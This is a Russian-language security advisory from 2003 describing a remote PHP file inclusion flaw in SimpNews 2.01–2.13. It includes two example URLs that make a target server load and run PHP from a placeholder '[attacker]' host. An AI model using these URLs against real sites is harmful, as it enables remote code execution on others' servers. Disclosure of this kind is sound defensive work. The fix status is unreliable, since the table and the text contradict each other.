| Дата публикации: | 23.07.2003 |
| Всего просмотров: | 1277 |
| Опасность: | Высокая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | SimpNews 2.x |
| Описание: | Уязвимость обнаружена в Simpnews (www.boesch-it.de). Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы на целевой системе.
Сценарии 'eventscroller.php' и 'eventcal2.php' включают несколько PHP функций без надлежащей проверки включаемых файлов. Удаленный пользователь может сконструировать специально обработанный URL, чтобы заставить целевой сервер включить произвольные PHP файлы на удаленном сервере и затем выполнить их. Пример: http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/ Это URL включит файлы 'config.php', 'functions.php', or 'includes/has_entries.inc' на сайте '[attacker]' и выполнит их на целевом сервере. http://[target]/eventscroller.php?path_simpnews=http://[attacker]/ Этот URL включит файлы 'config.php' и 'functions.php' на сайте '[attacker]' и выполнит их на целевом сервере. Уязвимость обнаружена в Simpnews 2.01-2.13 Способов устранения обнаруженной уязвимости не существует в настоящее время. |